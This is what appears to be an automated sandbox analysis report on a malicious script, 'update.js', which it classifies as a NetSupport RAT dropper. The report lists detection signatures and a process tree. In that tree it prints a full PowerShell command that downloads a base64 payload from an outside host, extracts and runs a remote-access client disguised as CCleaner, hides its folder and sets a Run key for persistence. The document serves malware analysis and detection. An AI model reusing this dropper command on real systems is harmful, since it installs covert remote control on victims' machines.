Edit tour
Windows
Analysis Report
update.js
Overview
General Information
Detection
NetSupport RAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
System process connects to network (likely due to code injection or exploit)
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Classification
- System is w10x64_ra
- wscript.exe (PID: 4992 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\updat e.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6412 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Ex Bypass -NoP -C $ AWBH='http ://didsit. com/data.p hp?7211';$ RGOZCXQBN= (New-Objec t System.N et.WebClie nt).Downlo adString($ AWBH);$RWP JKWOD=[Sys tem.Conver t]::FromBa se64String ($RGOZCXQB N);$asd = Get-Random -Minimum -10 -Maxim um 17; $RN GB=[System .Environme nt]::GetFo lderPath(' Applicatio nData')+'\ RYMB'+$asd ;if (!(Tes t-Path $RN GB -PathTy pe Contain er)) { New -Item -Pat h $RNGB -I temType Di rectory }; $p=Join-Pa th $RNGB ' CCleaner.z ip';[Syste m.IO.File] ::WriteAll Bytes($p,$ RWPJKWOD); try { Add -Type -A S ystem.IO.C ompression .FileSyste m;[System. IO.Compres sion.ZipFi le]::Extra ctToDirect ory($p,$RN GB)} catch { Write- Host 'Fail ed: ' + $_ ; exit};$ CV=Join-Pa th $RNGB ' client32.e xe';if (Te st-Path $C V -PathTyp e Leaf) { Start-Proc ess -FileP ath $CV} e lse {Write -Host 'No exe.'};$fd =Get-Item $RNGB -For ce; $fd.at tributes=' Hidden';$s =$RNGB+'\c lient32.ex e';$k='HKC U:\SOFTWAR E\Microsof t\Windows\ CurrentVer sion\Run'; $v='BCYLGM FSMV';$DS= 'String';N ew-ItemPro perty -Pat h $k -Name $v -Value $s -Prope rtyType $D S; MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - client32.exe (PID: 6308 cmdline:
"C:\Users\ user\AppDa ta\Roaming \RYMB15\cl ient32.exe " MD5: C4F1B50E3111D29774F7525039FF7086)
- svchost.exe (PID: 6260 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- wscript.exe (PID: 1448 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\D esktop\upd ate.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 9 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 7 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |